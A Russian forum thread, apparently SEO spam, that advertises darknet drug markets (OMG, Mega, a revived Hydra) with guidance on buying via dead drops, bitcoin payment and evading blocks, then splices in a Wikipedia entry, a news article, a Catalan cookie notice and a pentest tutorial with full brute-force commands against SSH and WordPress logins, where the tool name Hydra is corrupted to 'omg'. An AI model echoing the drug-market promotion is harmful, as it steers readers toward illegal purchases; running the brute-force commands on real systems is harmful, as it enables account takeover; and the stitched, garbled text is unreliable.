Сайт интернет магазина матанга matangapchela com

Ozyse

Модератор
Подтвержденный
Сообщения
591
Реакции
17
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Lehilut

Юзер
Сообщения
110
Реакции
1
Сайт интернет магазина матанга matangapchela com
Рабочие ссылки маркета помогают попасть на сайт ОМГ в том числе и через обычный браузер в обход запрета РКН.ССЫЛКА ДЛЯ ОБЫЧНОГО БРАУЗЕРАомг онион ссылка на торкаталог omg onionomg browserссылка на гидру в тор браузерomg ONION ссылка на моментальные магазины в TORПлощадка с закладками повсюду: в телеграме, в onion, в клирнете.Спам который вы ждали: эйфоретики, мяу, эйфоретики, шишки — это и многое другое в продаже на официальном сайте маркетплейса omg.ссылка на гидру зеркалоомг зайти в обходomg tor onionомг зайти в обходомг ссылка официальный onionомг онион ссылка на торomg browserомг зайти в обходне могу зайти на аккаунт гидрыomg рабочийомг аниономг онион ссылка на торссылка на гидру в тор браузерМосква, Санкт-Петербург, Новосибирск, Егорьевск, Кемерово, Самара, Саратов, Караганда, Сочи, Краснодар, Геленджик, Вологда, Иркутск, вся Россия и СНГ.Магазин запрещенный веществ omg — платформа нового поколения.ОМГ ТORговая площадкаОфициальные ссылки гидрыomg Onion (маркет ОМГ онион) — уникальная торговая площадка в сети TOR. Магазин работает по всей территории РФ, Беларусии, Украины, Казахстана функционирует 24 часа в сутки, без выходных, постоянная онлайн поддержка, гарант, автоматизированные продажи с опалтой киви или биткоин.ОМГ полностью анонимна и написана на современных языках программирования.Главная проблема при регистрации на гидре - это поиск официальной ссылки. Помимо tor ссылки, есть ссылка на гидру без тора.Основные преимущества сайта ОМГ заключаются в том, что:omg — самый удобный и безопасный маркетплейс для покупок товара;Маркетплейс самый популярный в России, СНГ и за границей. Есть несколько главных различий, в сравнении с другими сайтами, благодаря которым покупатели выбирают именно Гидру;Отсутствуют критичные уязвимости в безопасности (по заявлению администрации торговой площадки Гидрв);Вы можете завести собственный биткоин-кошелек, а также есть обменник биткоина (qiwi/bank/sim в bitcoin);Сайт обладает самой современной системой анонимности. За все время существования Площадки не было ни одной утечки личных данных покупателей и продавцов сайта.Постоянно появляются новые инструменты, позволяющие пользоваться интернетом анонимно и безопасно.В следствии чего были созданы онион-сайты (ссылки, находящиеся в домен-зоне onion).Из последних нововведений:не надо ожидать подтверждения транзакции в блокчейне;возможность быстро и удобно найти нужный товар;оплатить покупку можно с карты;заказы можно делать в любой момент;вся информация конфиденциальна;есть функционал чтобы открыть спор если заказ был исполнен плохо;Как уже было замечено, площадка ОМГ – крупнейший центр торговли в тор браузере. На этом сайте есть возможность купить то, что в обычном интернете купить невероятно сложно или невозможно совсем. Каждый зарегистрированный юзер может зайти в любой из существующих на сервисе шопов и купить запрещенный товар, организовав его доставку в города России и страны СНГ. Заказ возможен в любое время суток из любого уголка земли, где есть интернет. Особое преимущество Гидры это систематическое и регулярное обновление товаров магазинов.Подобрать и купить товар или услугу не составит никакого труда. Перед заказом можно ознакомиться с отзывами настоящих покупателей, купивших товар. Поэтому покупатель может заблаговременно оценить качество желаемого товара и решить, нужен ему продукт или все же от его приобретения стоит отказаться. Особенность закрытого маркетплейса в наличии сервиса тайных покупателей. Они следят за тем, чтобы вещества, которые представлены в магазинах соответствовали заявленным требованиям и даже делают в некоторых случаях химический анализ продаваемых веществ. Если по непонятным причинам находится несоответствие качеству товара, товар моментально снимают с витрины, продавца блокируют, магазин получает штраф.Транспортировку любого товара можно заказать в любой населенный пункт России и СНГ, указав адрес, где будет удобно забрать клад. Покупка передается в виде клада. После того, как покупатель подтвердит доставку заказа, убедится в качестве продукта селлер получит свои монеты. Если с качеством или доставкой матанга в момент проверки возникли проблемы, покупатель может открыть спор, к которому сразу же подключатся независимые модераторы Площадки. Оплата товаров осуществляется в биткоинах, и, в большинстве случаев, Магазины предпочитают принимать оплату биткоинами. Однако некоторые продавцы готовы принять оплату рублями через КИВИ кошелек. Сами сотрудники портала советуют производить оплату биткоинами, так как это самый безопасный способ оплаты, который также позволяет сохранить приватность совершаемых операций.Что такое ТОР и зачем он необходимTOR — это разработка военных, которая позволяет скрыть личность человека во всемирной сети Интернет. Расшифровывается "TOR" как The Onion Router — луковый маршрутизатор.Сначала ТОР был военным проектом Америки, но очень быстро его представили для спонсоров, и с тех пор он именуется Tor Project. Главная идея этого проекта — обеспечение анонимности и безопасности в сети, где большинство участников не верят друг другу. Смысл этой сети в том, что трафик следует через несколько компьютеров, шифруется, у них меняется исходящий IP и вы получаете зашифрованный канал передачи данных.Что обязательно надо учитывать при работе с Гидрой?От недобросовестных сделок с различными магазинами при посещении маркетплейса не застрахован ни один покупатель.Поэтому администраторы Гидры рекомендуют:смотреть на отзывы. Отзывы клиентов это важный критерий покупки. Мнения других покупателей могут повлиять на окончательное решение о приобретении товара или закладки. Благодаря оставленным отзывам можно узнать о качестве стаффа, способах доставки и других особенностях сотрудничества с магазином;завершать заказ исключительно после того, как будет подтверждено ее наличие и качество. Если образовались сложности матанга или проблемы, а подтверждение уже сделано, в таком случае деньги не удастся вернуть;оставлять отзывы после покупок. Это может помочь другим покупателям совершить правильный выбор и не совершить ошибку при выборе продавца;использовать абсолютно новые пароли и логины для каждого пользователя перед регистрацией. Желательно, чтобы пароли и логины не были ранее использованы на других сайтах. Это позволит следовать принципам анонимности и безопасности;Помните, что регулярно домен Гидры обновляется ее Администрацией. Дело в том, что сайт почти каждый день блокируют, и пользователю в результате не получается войти на страницу входа, не зная рабочих ссылок. Дабы избежать эту проблему, Администраторы и Модераторы портала призывают matanga добавить официальную страницу Гидры в закладки браузера. Сохрани себе все ссылки на Гидру и делись ими со своими товарищами.Соискатель на должность кладмена должен зарегистрироваться для того, чтобы пользоваться всеми возможностями Маркетплейса ОМГ.Когда модератор одобрит регистрацию пользователя, он получит доступ к правилам пользования площадки. Также сразу после входа он получит возможность внести деньги на баланс личного счета, чтобы тут же приступить к покупкам.Пополнение баланса на omg marketplace требует отдельного внимания. Дело в том, что для поплнения баланса стандартной валюты площадки – Биткоин – требуется сначала купить фиат, который впоследствии нужно будет обменять на биток. Приобрести его можно либо на криптовалютной бирже, либо в специальном пункте обмена.Когда фиат будет приобретен и обменен на определенное количество BTC, останется перевести их в систему. Чтобы это сделать, необходимо скопировать адрес биткоин кошелька, который был выдан при регистрации, и отправить на него требуемую сумму с помощью использования различных платежных систем (например, КИВИ). Также обменять киви на биток можно на самой площадке магазина в специальном разделе «обмен».Как не дать себя обманутьДля защиты от жульнических сайтов, была разработана сеть отказоустойчевых зеркал.Чтобы не попасть на мошеннические сайты сохрани ссылку зеркала на этот сайт в закладки. Скопируйте все рабочие ссылки с этого сайта к себе на компьютер так как Роскомнадзор может заблокировать сайт.
 

Zawux

Пассажир
Сообщения
111
Реакции
22
У этого термина существуют и другие значения, см. ОМГ.omg или «ОМГ» — крупнейший российский даркнет-рынок по торговле наркотиками, крупнейший в мире ресурс по объёму нелегальных операций с криптовалютой[3]. Существовал с 2015 по 2022 год[2][4][5].«ОМГ» была запущена в 2015 году, когда объединились Way Away и Legal RC, продававшие синтетические каннабиноиды и дизайнерские наркотики, отсутствовавшие на RAMP — ведущем даркнет-рынке[6]. Количество пользователей «Гидры» росло стабильно до середины 2017 года, когда ликвидация RAMP привела к взрывному росту регистраций. На середину 2019 года на ресурсе было зарегистрировано 2,5 миллиона аккаунтов, 393 тысячи из которых совершили хотя бы одну покупку. По оценке издания «Проект», за первую половину 2019 году на «Гидре» было заключено 850 тысяч сделок со средним чеком 4500 рублей[7]. По оценке «Лента.ру», в том же 2019 году за день устанавливалось более 13 тысяч закладок общей суммой 227 миллионов рублей[8].Кроме наркотиков, популярными товарами на «Гидре» являлись фальшивые деньги и документы, инструкции по противозаконной деятельности. Также на ресурсе реализовывались услуги, такие как сбыт наркотиков, интернет-безопасность и взлом аккаунтов. Кроме того, на «Гидре» выставлялись предложения по трудоустройству, как правило в сфере производства и сбыта наркотиков. В штат самой «Гидры» входили десятки людей, в том числе отдел рекламы, служба безопасности, химики и наркологи[7].Покупатели заходили на «Гидру» через Tor с луковой маршрутизацией. Они должны были зарегистрироваться и пополнять свой баланс, с которого средства (криптовалюта) списывалась продавцам (магазинам)[9]. Товар мог как находится в закладке к моменту оплаты, так и быть помещённым туда после. Магазины платили по 300 долларов за регистрацию на «Гидре», по 100 долларов ежемесячной абонентской платы, а также доплачивали при желании находиться повыше в выдаче на поисковый запрос. В течение суток после покупки клиент мог оставить отзыв о товаре и продавце. При нарушениях магазин мог быть «Гидрой» оштрафован или закрыт. С каждой покупки «ОМГ» брала комиссию от 1,5 % (при сумме сделки больше 2 миллионов рублей) до 5 % (при сумме сделки меньше 200 тысяч)[7].В 2019 году «Лента.ру» запустила на своём сайте расследовательский проект «Россия под наркотиками», посвящённый в первую очередь «Гидре». В конце года проект стал лауреатом «Премии Рунета»[10]. Главный редактор «Лента.ру» Владимир Тодоров отвергал подозрения, что проект на самом деле являлся скрытой рекламой «Гидры»[11]. Сама «ОМГ» в меморандуме конца 2019 года заявила о рекламном характере проекта[12]. В том меморандуме платформа объявила о выходе на ICO, где 49 % «Гидры» собирались реализовать как 1,47 миллиона токенов стартовой ценой 100 долларов каждый[8]. Там же сообщалось о выходе 1 сентября 2020 года на международный рынок путём организации площадки Eternos, которая должна работать через специально созданную анонимную сеть AspaNET[13].По мнению президента Фонда имени Андрея Рылькова Анны Саранг, продолжительная и успешная, в сравнении с иностранными даркнет-рынками, работа «Гидры» обусловлена тем, что российские ведомства больше заинтересованы в создании видимости борьбы с наркоторговлей путём ареста её мелких членов[7].5 апреля 2022 Федеральное ведомство уголовной полиции Германии сообщило о ликвидации «Гидры» и конфискации биткоинов на сумму, примерно эквивалентную 23 миллионам евро[5].По данным Минюста США одним из владельцев сайта является 30-летний российский бизнесмен Дмитрий Павлов, при этом сам он отрицает какое-либо участие в деятельности «Гидры»[1].Примечания↑ 1 2 Минфин США назвал имя одного из организаторов даркнет-маркетплейса omg. Им оказался бизнесмен из Череповца . The Insider. Дата обращения: 8 апреля 2022.↑ 1 2 В Германии закрыли сервера даркнет‑маркета omg и конфисковали биткойны на 23 млн евро . Ведомости (5 апреля 2022). Дата обращения: 5 апреля 2022.↑ Россияне держат валюту в даркнете. Коммерсантъ↑ В Германии закрыли серверы крупнейшего в мире русскоязычного даркнет-рынка . РИА Новости (5 апреля 2022). Дата обращения: 5 апреля 2022.↑ 1 2 Кеффер, Лаура. В Германии закрыли серверы крупнейшего в мире русскоязычного даркнет-рынка omg Market . Коммерсантъ (5 апреля 2022). Дата обращения: 5 апреля 2022.↑ Россия под наркотиками. Проект Лента.ру↑ 1 2 3 4 Вся эта дурь. Исследование о том, на чем сидит Россия. Проект (издание)↑ 1 2 Что не так с ICO omg? Объясняет эксперт. Секрет фирмы↑ Сомик К. В., Хабибулин А. Г. Совершенствование противодействия экономической преступности, использующей возможности сети Интернет и криптографических средств // Теория государства и права, том 20, № 4, C. 220-232↑ В Москве вручили Премию Рунета-2019. Российская газета↑ Главред "Ленты.Ру" отверг обвинения в скрытой рекламе наркоплощадки omg. Инфо / 24↑ Лента, которая победила Гидру. DrugStat↑ Васильева Н. А. Анализ цифровых платформ в сфере незаконного оборота наркотиков для построения криминалистической характеристики данного вида преступлений // Юридический форум, сборник статей Международной научно-практической конференции. № 2, 2020. С. 71—76.СсылкиИсточник — https://ru.wikipedia.org/w/index.php?title=ОМГ_(даркнет-рынок)&oldid=121322914
Сайт интернет магазина матанга matangapchela com
 
P

Pynewow

Продвинутый юзер
Сообщения
40
Реакции
3
Во времена тотальной цензуры в сети, большое число сайтов, где можно было приобрести нелегальные услуги и товары, блокируют фактически ежедневно. После внезапной ликвидации подпольного маркета SilkRoad, значительная часть русских продавцов и покупателей переехала на omg. Давайте побольше поговорим об этом интересном онлайн магазине! Чтобы попасть на сам сайт, почитайте статью , она поможет вам чуть лучше разобраться в механике работы данного сайта. Сама по себе omg — это площадка, на которой в абсолютно анонимном режиме можно заказать любые услуги и товары, начиная от законных, оканчивая незаконными. Тут можно купить: услуги по взлому, инструкции по белому и серому заработку, любые вещества, фактически любые документы и сотни других полезных товаров.ОМГ контролирует качество продаваемых товаров и услуг, для этого работает рейтинг продавцов, полноценная система отзывов от покупателей. При надобности покупатель вправе обратиться в арбитраж ресурса и решить любой конфликтный момент. Для обеспечения анонимности собственных пользователей, оплата любых товаров на сайте осуществляются лишь в криптовалюте биткоин. Ее можно переводить прямо с собственного кошелька, а можно приобрести во внутреннем обменном пункте. Применение подобного метода оплаты создаёт анонимность любых денежных переводов. При регистрации покупателю с целью сохранения абсолютной анонимности не придется даже называть свой email, и потому собственные регистрационные данные лучше основательно запомнить.Часто покупатели встречаются с проблемой, что основной сайт omg заблокирован, причём некоторые провайдеры могут блокировать даже тор-соединения. При данном раскладе есть много вариантов того, как можно перейти не указанный ресурс. Лучше найти через поисковик одно из актуальных зеркал Гидры, которое переправит вас на маркет. Сеть рабочих зеркал постоянно обновляется, дабы обходить блокировки. Кроме этого на часть заблокированных зеркал Гидры можно зайти через VPN, однако указанный способ намного снижает уровень вашей анонимности. Если правильно настроить Тор, чтобы он использовал не публичные мосты, то тогда вам без проблем удастся попасть на зеркало Гидры внутри зоны onion. При пользовании сайтом не открывайте собственные персональные данные никому, даже если крупный продавец станет просить вас об этом.
 
Z

Zeceg

Продвинутый юзер
Сообщения
87
Реакции
13
Новости · Экономика12:36, 25 июля 201920254912:36, 25 июля 2019202549Российская торговая площадка в даркнете (теневая часть интернета — ред.) «ОМГ» стала крупнейшей в мире по продаже наркотиков. К таким выводам пришел «Проект», который провел исследование сделок нелегального ресурса.«ОМГ» выполняет роль посредника между продавцами и покупателями. Помимо наркотиков, на площадке можно купить поддельные купюры, хакерские услуги, фальшивые документы и другие запрещенные товары. За этот год площадка заработала 1,4 млрд рублей.На «Гидре» зарегистрированы 2,5 млн аккаунов, 393 тысячи из них совершили за время существования площадки хотя бы одну покупку. Число пользователей с каждым месяцем растет, утверждает издание.Так, с 2016 по 2019 год пользователи внесли на «Гидру» 64,7 млрд рублей (1 млрд долларов на июнь). Общий объем сделок, который прошел через западный даркнет с 2011 по 2015 год, составил 191 млн долларов (12 млрд рублей на июнь).Согласно исследованию, лидером по наркотикам, которые спрятаны в «закладках» (продавец упаковывает товар и закладывает в неприметном месте — ред.), стала Москва. По данным на 1 июня, в них лежало наркотиков на 150 млн рублей.На втором месте — Петербург, где в «закладках» лежало наркотиков на 66 млн рублей. Петербург также является основной точкой ввоза наркотиков из Европы, говорят авторы исследования. Причем большинство «импортных» наркотиков стоят там дешевле, чем в других городах, из-за низких расходов на логистику.Общая сумма «кладов», спрятанных на территории России на 1 июня 2019 года, — 348 млн рублей (5,52 млн долларов), подсчитал «Проект». В «закладках» по всей стране лежит минимум полтонны наркотических веществ (645,6 кг).«Умершая, вы арестованы»История обвиняемой по 228 статье, которая полгода находилась в СИЗО с онкологией, а потом доказывала государству, что она вообще живаИздание отмечает, что сейчас виден тренд на потребление новых синтетических наркотиков — мефедрона и альфа-ПВП. Основная причина — их легкий синтез и низкая цена. Одновременно снижается потребление героина — его доля на российском рынке составляет 0,3%.Несмотря на увеличение спроса на наркотики во многих городах России (по информации «Проекта»), официальные данные говорят об обратном. Как сообщал Минздрав, в России снижается число людей, которые находятся на лечение от наркозависимости, и количество преступлений, связанных с оборотом наркотиков.«Проект» выдвигает две версии, почему данные расходятся. Первая – госорганы занижают статистику и плохо борются с торговлей наркотиками в даркнете (в 2015 году было заведено 272 уголовных дела, в которых упомянута «ОМГ»). Вторая — официальная статистика не фиксирует тех, кто употребляет наркотики нерегулярно.Делаем честную журналистику
вместе с вамиКаждый день мы рассказываем вам о происходящем в России и мире. Наши журналисты не боятся добывать правду, чтобы показывать ее вам.В стране, где власти постоянно хотят что-то запретить, в том числе - запретить говорить правду, должны быть издания, которые продолжают заниматься настоящей журналистикой.Ваша поддержка поможет нам, «Новой газете», и дальше быть таким изданием. Сделайте свой вклад в независимость журналистики в России прямо сейчас.#даркнет #исследование #наркотики #ekОткрытое письмоОмбудсмену, главе ФСИН и генпрокурору РФ — в защиту Навальноговажно2 часа назадЧто произошло за день 26 марта. КороткоНОВОСТИважно3 часа назадПутин назначил сенатора Мельниченко врио главы Пензенской областиважнодень назад«Одна нога у него практически не действует»: адвокаты Навального сообщили об ухудшении состояния здоровья политикаТрекер COVIDНастоящие цифры пандемии и вакцинации по регионам России от дата-отдела «Новой газеты»НОВОСТИтемаЭкспедиция на полуостровSlide 1 of 6РасследованияКрым их Как поделили полуостров друзья Владимира Путина и местные чиновники. И чем этот «дележ» обернулся для обычных жителейИван Жилин,Арден АркманВыездное расследованиеРуки по локоть в Крыму Как крымчане отдали полуостров российским олигархам и кланам местных чиновников. Большая экспедиция «Новой газеты» на полуостровВыездное расследование«Путину сказали, что мы спонсируем АТО» Под видом «национализации украинского имущества» власти забрали магазины, кафе и автомобили у более чем 18 тысяч крымчан. Материал из серии «Руки по локоть в Крыму»Иван ЖилинВыездное расследованиеОлива красная Как живет крымский поселок, окруженный дачами президента, зампреда Совбеза и санаторием ФСБ. Материал из серии «Руки по локоть в Крыму»Надежда ИсаеваСюжетыКрым наш? Эксплейнер «Новой газеты»Мультимедиа «Новой»Читайте все материалы темыНОВОСТИвыпуск№ 32 от 26 марта 2021Slide 1 of 11№ 32 от 26 марта 2021№ 31 от 24 марта 2021№ 31 от 24 марта 2021№ 30 от 22 марта 2021№ 30 от 22 марта 2021№ 29 от 19 марта 2021№ 29 от 19 марта 2021№ 28 от 17 марта 2021№ 28 от 17 марта 2021№ 27 от 15 марта 2021№ 27 от 15 марта 2021№ 26 от 12 марта 2021№ 26 от 12 марта 2021№ 25 от 10 марта 2021№ 25 от 10 марта 2021№ 24 от 5 марта 2021№ 24 от 5 марта 2021№ 23 от 3 марта 2021№ 23 от 3 марта 2021В архив выпусков «Новой газеты»Топ 61.РасследованияКрым их Как поделили полуостров друзья Владимира Путина и местные чиновники. И чем этот «дележ» обернулся для обычных жителей4946432.КомментарийПрасковеевские небеса Тайны геленджикского двор[ц]а: кому он принадлежит на самом деле, зачем его строили и как рухнули мечты. Исследование Владимира Пастухова2570433.КомментарийБольшие деньги при плохой еде Власть распространяет на всю страну модель «сталинских колхозов»: народ должен нищать и помалкивать2004624.КолонкаМасочный режим для фуфловира Главу «Биотек» Шпигеля арестовали потому, что госструктуры не простили частникам конкуренции в ковид-пандемию. А губернатор пошел довеском1807025.Сюжеты«Заткните это животное!» В Находке структуры, которые были связаны с Ротенбергом, строят завод по производству метанола для Китая. Он нравится всем, кроме местных жителей1712456.Сюжеты«Умирать я буду одинокой» Пройти девяностые и штурмовать Грозный, биться на ринге и прыгать с парашютом. Ничто не сделает мужчину — мужчиной, если внутри него живет женщина165898Вы можете просто закрыть это окно и вернуться к чтению статьи. А можете — поддержать газету небольшим пожертвованием, чтобы мы и дальше могли писать о том, о чем другие боятся и подумать. Выбор за вами!Стать соучастникомК сожалению, браузер, которым вы пользуетесь, устарел и не позволяеткорректно отображать сайт. Пожалуйста, установите любой из современныхбраузеров, например:Google ChromeFirefoxOpera
 
Y

Ywopenop

Продвинутый юзер
Сообщения
40
Реакции
24
Aquest lloc web utilitzacookies per recopilar informació estadística sobre la navegaciódels usuaris i millorar els seus serveis amb les sevespreferències, generades a partir de les vostres pautes denavegació. Podeu consultar la seva configuració a la nostraPolíticade Cookies.Acceptar © 2002-22 Fundació Ensenyament i Família | Tel.933876199Avíslegal | Política decookies
 

Enere

Продвинутый юзер
Сообщения
70
Реакции
4
Brute-force (атака полным перебором) – метод решения математических задач, сложность которого зависит от количества всех возможных решений. Сам же термин brute-force обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису.Рассмотрим инструменты, которые можно использовать для выполнения brute-force атак на SSH и WEB-сервисы, доступные в Kali Linux (Patator, Medusa, omg, Metasploit), а также BurpSuite.

Все материалы, предоставленные в рамках данной статьи, предназначены для использования исключительно в учебных целях. Использование материалов в противоправных и противозаконных запрещено.

Brute-force SSH
Для примера возьмем тестовую машину 192.168.60.50 и попробуем подобрать пароль пользователя test по SSH. Мы будем использовать популярные пароли из стандартного словаря rockyou.txt.
Patator
Для подбора пароля средствами Patator используем команду:patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’где:
ssh_login — необходимый модуль
host – наша цель
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора
password – словарь с паролями
-x ignore:mesg=’Authentication failed’ — команда не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.
omg
Для подбора пароля используя omg выполним команду:omg -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50где:
-V – показывать пару логин+пароль во время перебора
-f – остановка как только будет найден пароль для указанного логина
-P – путь до словаря с паролями
ssh://192.168.60.50 – указание сервиса и IP-адрес жертвы
Medusa
Для подбора пароля с использованием Medusa выполним команду:medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6где:
-h – IP-адрес жертвы
-u – логин
-P – путь к словарю
-M – выбор модуля
-f – остановка после нахождения валидной пары логин/пароль
-v – настройка отображения сообщений на экране во время процесса подбора
Metasploit
Произведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_login и получили ответ:Задействуем модуль:use auxiliary/scanner/ssh/ssh_loginДля просмотра необходимых параметров, воспользуемся командой show options. Для нас это:
rhosts – IP-адрес жертвы
rport – порт
username – логин SSH
userpass_file – путь до словаря
stop_on_success – остановка, как только найдется пара логин/пароль
threads – количество потоковУказание необходимых параметров производится через команду "set".set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22Указав необходимые параметры набираем команду "run" и ждем.Противодействие
Ограничить количество устанавливаемых соединений с использованием межсетевого экрана. Пример настройки iptables:-A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset.Такое правило установит ограничение доступа к SSH для каждого IP-адреса до 1 соединения в секунду, значительно усложнив перебор. Также эффективным решением может быть использование двухфакторной аутентификации (например, используя eToken) или аутентификации с использованием ключевой пары, а также использование ACL на основе IP-адресов.Brute-force WordPress
Рассмотрим другой пример — подбор пароля окна авторизации веб-формы.Для примера будем подбирать пароль от учетной записи администратора wordpress.
BurpSuite
Для начала нам необходимо понять, как происходит процесс авторизации. Для этого мы будем использовать BurpSuite. Нам необходимо попробовать авторизоваться с любым паролем и логином, чтобы посмотреть какие запросы проходят через BurpSuite.Отлично, мы увидели POST запрос для авторизации с ним мы и будем работать.
В BODY указано какой логин и пароль проверялись, а значит, мы можем попробовать самостоятельно подставить нужные нам значения.
Передаем этот запрос в Intruder и там выбираем необходимые параметры для атаки. В пункте Payload Positions тип атаки оставляем sniper, но для проверки оставляем только параметр pwd. Таким образом, при атаке будет изменяться только этот параметр.Загружаем необходимый словарь и начинаем атаку.Из поведения веб-приложения мы видим, что неверный пароль возвращает код ответа 200. После перебора словаря, видим, что один из паролей дал ответ с кодом 302 — он и является верным.Данный метод перебора занимает намного больше времени, чем при использовании Patator, omg, Medusa и т.д. Даже с учетом того, что мы взяли небольшой словарь, BurpSuite перебирал словарь около 40 минут.
omg
Попробуем подобрать пароль с помощью omg.
Как мы уже знаем, при неверной авторизации возвращается код 200, а при успешной – 302. Попробуем использовать эту информацию.
Для запуска используем команду:omg -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"Здесь мы указываем обязательные параметры:
-l – имя пользователя
-P – словарь с паролями
-t – количество потоков
http-post-form – тип формы, у нас POST.
/wp-login.php – это URL страницы с авторизацией
^USER^ — показывает куда подставлять имя пользователя
^PASS^ — показывает куда подставлять пароль из словаря
S=302 – указание на какой ответ опираться omg. В нашем случае, ответ 302 при успешной авторизации.
Patator
Как мы уже знаем, при неудачной авторизации возвращается код 200, а при удачной – 302. Будем использовать тот же принцип, что и с omg:
Запуск производится командой:patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body='log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1' 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1http_fuzz – модуль для brute-force атаки http
url – адрес страницы с авторизацией
FILE0 — путь до словаря с паролями
body – информация, которая передается в POST запросе при авторизации
-t — количество потоков
-x – В данном случае мы указали команду не выводить на экран сообщения строки, содержащие параметр с кодом 200
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос
Как итог – нам удалось подобрать пароль.
Nmap
Утилита Nmap позволяет в том числе производить подбор паролей для веб-форм авторизации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:
--script-args – добавление аргументов
user или userdb – логин или файла с логинами
pass или passdb — указание пароля или словаря
thread – количество потоков
firstonly=true – выводить результат после первого же правильного пароляnmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'Противодействие
Ограничить (усложнить) brute-force атаки на web-приложения можно средствами iptables (по аналогии с SSH) и средствами nginx. Для этого необходимо создать зону лимитов:
...
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
...

и задействовать ее:
location / {
...
limit_req zone=req_limits burst=10;
limit_req_status 429;
...
}

Такие настройки позволят ограничить количество запросов с одного IP-адреса до 40 в секунду.Усложнить задачу перебора можно используя следующие методы:
— Применение межсетевого экрана и прочего ПО для ограничения количества обращений к защищаемому сервису. О том, как мы используем машинное обучение для выявления подобных атак (в том числе распределенных), можно почитать в статье.
— Использование средств, препятствующих быстрой проверке корректности ключа (например, Captcha).Заключение
В данной статье мы поверхностно рассмотрели некоторые популярные инструменты. Сократить риск подбора пароля можно, следуя следующим рекомендациям:
— используйте устойчивые к подбору пароли;
— не создавайте пароли, используя личную информацию, например: дату рождения или имя + дата рождения или мобильный телефон;
— регулярно меняйте пароль;
— на всех аккаунтах применяйте уникальные пароли.Подобные рекомендации (как и рекомендации по безопасной веб-разработке) мало кто соблюдает, поэтому необходимо использовать различные программные решения, позволяющие:
— ограничить подключение по IP-адресу, или, если это невозможно, ограничить одновременное количество соединений с сервисом (средствами iptables, nginx и прочими);
— использовать двухфакторную аутентификацию;
— выявлять и блокировать подобные атаки средствами SIEM, WAF или другими (например, fail2ban).
 
Сверху Снизу